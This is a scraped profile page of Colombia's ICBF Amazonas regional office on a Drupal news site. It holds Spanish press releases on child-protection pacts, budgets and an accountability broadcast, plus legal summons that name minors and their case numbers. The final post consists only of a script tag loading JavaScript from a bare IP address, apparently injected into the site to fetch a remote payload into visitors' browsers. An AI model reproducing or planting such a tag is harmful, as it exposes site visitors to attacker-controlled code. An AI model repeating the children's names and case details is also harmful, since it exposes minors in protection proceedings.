icbfamaz

Menssagem de erro

User warning: The following module is missing from the file system: comments. For information about how to fix this, see the documentation page. em _drupal_trigger_error_with_delayed_logging() (linha 1143 de /var/www/tabatingahoje/includes/bootstrap.inc).

Histórico

Membro há
2 anos 10 meses
Instituto Colombiano de Bienestar Familiar - Regional Amazonas

icbfamaz

Foto de icbfamaz
Teléfonos: 
5928060
Ubicación: 
Dirección Regional ICBF Regional Amazonas
Carrera 4 No. 4-10 Barrio Gaitán
Leticia , AMZ
Colômbia
4° 13' 3.0612" S, 69° 56' 2.3532" W
Amazonas CO
Foto de icbfamaz
quarta-feira, Novembro 22, 2017 - 17:41

Meta, segundo departamento en firmar Pacto contra las Violencias hacia las Niñas, Niños y Adolescentes

• ICBF atiende 59.442 beneficiarios en Meta con una inversión de $96.261 millones

• Niños y niñas de comunidades Sikuani y Jiw se beneficiarán con la Modalidad Propia e Intercultural con una inversión de $4.216 millones.

Villavicencio, ‪22 de noviembre de 2017. Con la firma del Gran Pacto contra las Violencias hacia las Niñas, Niños y Adolescentes, Meta se convierte en el segundo departamento de Colombia que se suma a la iniciativa del Instituto Colombiano de Bienestar Familiar (ICBF), en alianza con la Gobernación del Meta, la Alcaldía de Villavicencio, World Visión Colombia en representación de las Organizaciones no Gubernamentales, el sector privado, la sociedad civil y UNICEF, con el fin de unir esfuerzos para prevenir y erradicar la vulneración de derechos de la población infantil

Para la Directora General del ICBF, Karen Abudinen Abuchaibe, “a todas las niñas, niños y adolescentes se les deben garantizar sus derechos, entre ellos crecer en una familia y en entornos protectores que les aseguren afecto, amor, comprensión, cuidado y seguridad, por eso, como Familia, sociedad y Estado somos corresponsables de ello”.

Durante la firma del pacto, realizada en el Auditorio Biblioteca Germán Arciniegas, la Directora del ICBF anunció el aumento de la planta de personal para la Regional Meta en 38 servidores para las Defensorías de Familia y apoyo a la gestión, pasando de 141 personas a 179, quienes se suman a los 81 profesionales y técnicos que se vincularán por contrato de prestación de servicios, para un total de 260 personas que atenderán a los niños, niñas, adolescentes y familias.

Igualmente, destacó que el ICBF llega con acciones concretas para el Meta y anunció que pondrá en marcha la modalidad de atención para mujeres gestantes, madre en periodo de lactancia y niños menores de dos años, llamada “1.000 Días para Cambiar el Mundo”, que contará con un presupuesto de $3.337 millones para atender 3.157 cupos en los municipios de Mapiripán, San Juanito, Acacías, San Martín, Puerto Concordia y Puerto Gaitán.

Otro de los compromisos asumidos por el ICBF en el marco de la firma del Pacto, es atender a 2.100 beneficiarios de las Comunidades Sikuani y Jiw en los municipios de Puerto Gaitán y Mapiripán con la Modalidad Propia e Intercultural para la Primera Infancia con una inversión de $4.216 millones.

“Llevaremos a cabo un plan de descongestión para evacuar las denuncias presentadas a la línea 141, que permita responder de manera oportuna frente a toda vulneración de derechos e implementaremos la estrategia Construyendo Juntos Entornos Protectores, brindando atención en el departamento a 1.200 beneficiarios entre educadores, padres de familia y estudiantes, priorizando 11 municipios donde hay mayor índice de violencia contra los niños, niñas y adolescentes”, sostuvo la Directora.

Después del firmado en Antioquia el pasado 1 de noviembre, el pacto en el Meta es el segundo de los 10 que se firmarán en diferentes territorios del país, donde más se reportan casos de vulneración de derechos en contra de la población infantil, como: Bogotá, Cundinamarca, Valle del Cauca, Atlántico, Nariño, Magdalena, Huila y Córdoba.

“Hoy estamos acá para decirle a los niños, niñas y adolescentes del Meta que no están solos, que nosotros nos convertiremos en su voz ante la sociedad, para que crezcan en entornos protectores y con todos sus derechos garantizados”, puntualizó.

12729
0
0 Comments
Votos totales: 46
Foto de icbfamaz
quarta-feira, Novembro 22, 2017 - 10:02

CITACIÓN Y EMPLAZAMIENTO SIM 6067602374

Respetuosamente, NATALIA LISSETH PORTELA PÉREZ, en mi calidad de Defensora de Familia No. 03 del Centro Zonal Leticia, en aras de dar cumplimiento a lo dispuesto en el artículo 102 del CIA, me permito solicitar citación y emplazamiento del ELAR RAMIREZ INUMA, progenitor, familiares y demás personas interesadas, para que en el término de cinco (05) días hábiles se presenten en la Defensoría de Familia No. 03 del Centro Zonal Leticia, ubicado en la carrera 11 No. 3 – 90 barrio San Antonio, con el fin de NOTIFICARLES el Auto de la Apertura de la Investigación No. 094 del 16 de agosto del 2017, dictado dentro del Proceso Administrativo de Restablecimiento de Derechos adelantados a favor de la adolescente NAYELY SOFIA RAMIREZ VARGAS Historia Socio Familiar No. 1006732588 e igualmente se le notifica de la audiencia de práctica de pruebas y fallo PARD llevada a cabo el día de hoy 22 de noviembre del 2017.

De no asistir se entenderá surtida la notificación y la citación,

Natalia Lisseth Portela Perez
Defensora de Familia No. 03
Cra 11 N° 3 – 90 Barrio San Antonio
Centro Zonal Leticia
Regional Amazonas

12728
0
0 Comments
Votos totales: 39
Foto de icbfamaz
quarta-feira, Novembro 22, 2017 - 09:03

ICBF alcanza los 2 millones de niños y niñas atendidos de manera integral gracias al fortalecimiento presupuestal

• Desde el año 2010, el ICBF cuadruplicó los recursos invertidos en la atención de primera infancia hasta los 4 billones de pesos en 2017.

• Gracias al aumento sostenido de la inversión en los últimos 8 años, el ICBF incrementó el número de beneficiarios en 800.000 niños.

• Para cumplir las metas de 2018, el Ministerio de Hacienda aprobó un presupuesto récord de 6,4 billones de pesos.

Bogotá, 21 de noviembre 2017.- El fortalecimiento presupuestal en los últimos 8 años, le ha permitido al Instituto Colombiano de Bienestar Familiar (ICBF) garantizar la atención integral de 2 millones de niños y niñas de la primera infancia durante todo el año y mejorar el proceso de supervisión de los programas específicos para ellos.

Así lo destacó la Directora General de la Entidad, Karen Abudinen Abuchaibe, al presentar junto con el Ministro de Hacienda, Mauricio Cárdenas Santamaría, un balance sobre la inversión de los recursos que el Gobierno Nacional ha destinado para la atención de los niños, los adolescentes y las familias más vulnerables del país, a través del Instituto.

Desde las instalaciones del Centro de Desarrollo Infantil (CDI) Jacques Cousteau en Bogotá, Abudinen resaltó que el presupuesto aprobado por el Ministerio de Hacienda para el próximo año alcanzará la cifra récord de 6,4 billones de pesos y recordó la importancia que para la Entidad tuvo la adición presupuestal por 123.000 millones de y la formalización de 3.700 cargos provisionales para este año.

“Los CDI son el resultado de una inversión que refleja el compromiso del presidente Juan Manuel Santos con la niñez y con las familias colombianas. Tenemos claro que invertir en la niñez es invertir en una paz sostenible, y en la búsqueda de las condiciones para el bienestar de esta nueva generación que sueña con un mejor país”, dijo Abudinen.

A la vez, precisó que “gracias al compromiso del Gobierno con la niñez, podremos atender con más eficiencia a los 2,9 millones de niños, adolescentes y familias beneficiarias de todos nuestros programas, en las 33 regionales y 209 centros zonales de todo el país, sin generar costos adicionales en la administración”.

12727
0
0 Comments
Votos totales: 40
Foto de icbfamaz
terça-feira, Novembro 21, 2017 - 10:52

El Instituto Colombiano de Bienestar Familiar (ICBF), participó en la Mesa ampliada de Primera Infancia, Infancia y Adolescencia de los municipios de Puerto Nariño y Leticia en el departamento de Amazonas, con el objetivo de fortalecer el componente étnico en la formulación de políticas públicas.

La jornada contó con la participación de representantes de entidades que conforman el SNBF, como el Ministerio de Salud y Educación, quienes resaltaron la importancia del trabajo para conservar las tradiciones de los pueblos indígenas a la hora de entregar la oferta de las instituciones.

Durante el encuentro se enfatizó que el Código de Infancia y Adolescencia demanda a los municipios y departamentos priorizar en Políticas Públicas que incidan en la solución de las problemáticas de la población más vulnerable e intervenirlas de forma organizada y efectiva.

Entre las principales acciones a priorizar en Amazonas están las de minimizar la mortalidad materna e infantil, la desnutrición, el consumo de sustancias psicoactivas, embarazo en adolescentes y la formulación de estrategias con enfoque diferencial para los pueblos indígenas.

Durante el encuentro se socializaron diferentes estrategias de entidades que hacen parte del SNBF las cuales fueron construidas en conjunto con las comunidades indígenas del Amazonas y se enfocan en usos y hábitos alimenticios entre otros factores de cuidado que utilizan las madres gestantes y lactantes, así como garantizar el control y registro de vacunas, asistencias médicas y demás actividades que realice la madre y el niño entre los meses de gestación hasta los 5 años.

12708
0
0 Comments
Votos totales: 41
Foto de icbfamaz
segunda-feira, Novembro 20, 2017 - 11:11

CITACIÓN Y EMPLAZAMIENTO SIM 6067602378

Respetuosamente, NATALIA LISSETH PORTELA PÉREZ, en mi calidad de Defensora de Familia No. 03 del Centro Zonal Leticia, en aras de dar cumplimiento a lo dispuesto en el artículo 102 del CIA, me permito solicitar citación y emplazamiento del Señor CARLOS ANDRÉS ORDOÑEZ, progenitor, familiares y demás personas interesadas, para que en el término de cinco (05) días hábiles se presenten en la Defensoría de Familia No. 03 del Centro Zonal Leticia, ubicado en la carrera 11 No. 3 – 90 barrio San Antonio, con el fin de NOTIFICARLES el Auto de la Apertura de la Investigación No. 106 del 12 de octubre del 2017, dictado dentro del Proceso Administrativo de Restablecimiento de Derechos adelantados a favor del niño FAVIO ALEJANDRO ORDOÑEZ MORENO Historia Socio Familiar No. 1.029.380.435 e igualmente para notificarlo de la audiencia de práctica de pruebas y fallo PARD que se llevará a cabo el próximo Martes 28 de noviembre del 2017 a las 09:00 a.m.

De no asistir se entenderá surtida la notificación y la citación,

Artículo 102 código e infancia ya adolescencia y artículo 318 Código de Procedimiento Civil.

Natalia Lisseth Portela Perez
Defensora de Familia No. 03
Cra 11 N° 3 – 90 Barrio San Antonio
Centro Zonal
Regional Amazonas

12691
0
0 Comments
Votos totales: 37
Foto de icbfamaz
segunda-feira, Novembro 20, 2017 - 10:59
12690
0
0 Comments
Votos totales: 34
Foto de icbfamaz
segunda-feira, Novembro 20, 2017 - 09:23

La Regional Amazonas del Instituto Colombiano de Bienestar Familiar invita a toda la ciudadanía a participar durante la emisión del programa de Rendición Pública de Cuentas 2017, enviando sus preguntas sobre los temas o contenidos del programa, a los medios sociales del ICBF: Facebook: @ICBFColombia y Twitter:@ICBFColombia

Emisión: Lunes, 20 de noviembre de 2018
Hora: 10:00 a.m. vía Señal Institucional

#ICBFporLaTransparencia

12689
0
0 Comments
Votos totales: 32
Foto de icbfamaz
sexta-feira, Novembro 17, 2017 - 14:47

COMUNICADO A LA OPINIÓN PUBLICA

Leticia, 16 de noviembre de 2017. Frente al presunto abuso del que fue víctima una adolescente de 13 años en el municipio de Leticia, el Instituto Colombiano de Bienestar Familiar en Amazonas, se permite informar que:

• Una vez el caso fue notificado por las autoridades competentes, el ICBF designó un equipo de profesionales para brindarle acompañamiento psicosocial a la adolescente y su familia.

• El Centro Zonal Leticia activó la Ruta de Atención y el equipo interdisciplinario del Centro de Atención a Víctimas de Abuso Sexual (CAIVAS), realizó la pertinente valoración y verificación de derechos a la menor de edad.
• De igual forma, se le inició un Proceso Administrativo de Restablecimiento de Derechos.

• El ICBF reitera el llamado a la comunidad para que a través de la Línea 141, denuncie cualquier vulneración de derechos de los niños, niñas y adolescentes.

12632
0
0 Comments
Votos totales: 33
Foto de icbfamaz
sexta-feira, Novembro 17, 2017 - 14:37

ICBF Regional Amazonas emitirá su Rendición Pública de Cuentas 2017#ICBFporLaTransparencia

Leticia, 15 de noviembre de 2017. A través de un ejercicio innovador y transparente dirigido a toda la sociedad, la Regional Amazonas del Instituto Colombiano de Bienestar Familiar, emitirá el próximo lunes 20 de noviembre, su Rendición Pública de Cuentas 2017, el cual podrá ser sintonizado a partir de las 10 a.m. por la señal del Canal Institucional.

La Dirección Regional presentará un balance de la gestión institucional en materia de logros alcanzados, ejecución presupuestal, y el impacto de la atención en Primera Infancia, Protección, Niñez y Adolescencia, Nutrición y Familias y Comunidades en el Amazonas, que para la vigencia 2017 tuvo un presupuesto asignado de $20 mil millones de pesos para la ejecución de los diferentes programas dirigidos al bienestar de los niños, niñas, adolescentes y las familias de la región;

Por medio de la estrategia de Cero a Siempre, ICBF brindó atención integral a 4.739 beneficiarios entre madres gestantes, lactantes, niños y niñas entre los 0 y 5 años; de los cuales 1.731 se benefician de la modalidad institucional a través de los Centro de Desarrollo Infantil y 3.008 se encuentran en la modalidad Familiar, en los municipios de Leticia, Puerto Nariño y las áreas no municipalizadas del departamento.

Gracias al programa de recuperación nutricional 1000 días para Cambiar el Mundo, se atienden 480 usuarios a través de tres Unidades de Servicio, con este programa se busca la recuperación nutricional de beneficiarios con un estado inicial de desnutrición aguda.
Con el programa Generaciones con Bienestar, se promueve el empoderamiento de derechos, la protección integral y el proyecto de vida en 2.000 niños, niñas y adolescentes entre los 6 y 17 años, de los cuales 1.400 participan en la modalidad étnica y 600 en la modalidad tradicional.

A través de la estrategia Acciones Masivas de Alto Impacto (AMAS) que para el 2017 tuvo como enfoque la prevención de la Explotación Sexual y Comercial contra niñas y adolescentes, se atendieron 168 beneficiarias. Otras estrategias del ICBF dirigidas al bienestar de la niñez y adolescencia son la estrategia Construyendo Juntos Entornos Protectores y la Estrategia de Prevención de Embarazo en Adolescentes.

Por su parte, ICBF atendió a 810 familias y comunidades de la región con su programa Familias con Bienestar con 480 familias beneficiarias, mientras que el programa Territorios Étnicos con Bienestar atendió a 300 familias de diferentes comunidades indígenas y 30 participaron en las Unidades de Apoyo a Fortalecimiento Familiar – UNAFA.

A través de la Unidad Móvil, se brindó acompañamiento psicosocial a todas las familias víctimas del conflicto armado que viven en el departamento y gracias al acompañamiento del Equipo Móvil de Protección integral - EMPI, se ha fortalecido la prevención del trabajo infantil.

Desde el Centro Zonal Leticia, se restablecen los derechos amenazados, inobservados o vulnerados a través de 3 defensorías de familias y sus equipos interdisciplinarios, como apoyo a los procesos administrativos de restablecimiento de derechos, el ICBF Regional Amazonas dispone de diferentes medidas de protección como Hogares Sustitutos, Hogares Gestores y medidas en el Sistema de Responsabilidad Penal para Adolescentes dirigido a los jóvenes en conflicto con la ley.

Así mismo, el ICBF como ente rector del Sistema Nacional de Bienestar Familiar, ha articulado y apoyado en las diferentes instancias regionales, iniciativas institucionales y gubernamentales a favor de la protección integral a los niños, niñas y adolescentes y el bienestar de la familias colombianas.

La Regional Amazonas del Instituto Colombiano de Bienestar Familiar invita a toda la ciudadanía a participar durante la emisión del programa de Rendición Pública de Cuentas 2017, enviando sus preguntas sobre los temas o contenidos del programa, a los medios sociales del ICBF: Facebook: @ICBF Colombia
y Twitter: @ICBFColombia.

12631
0
0 Comments
Votos totales: 30
Foto de icbfamaz
sexta-feira, Novembro 17, 2017 - 14:34
<script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
12630
0
0 Comments
Votos totales: 38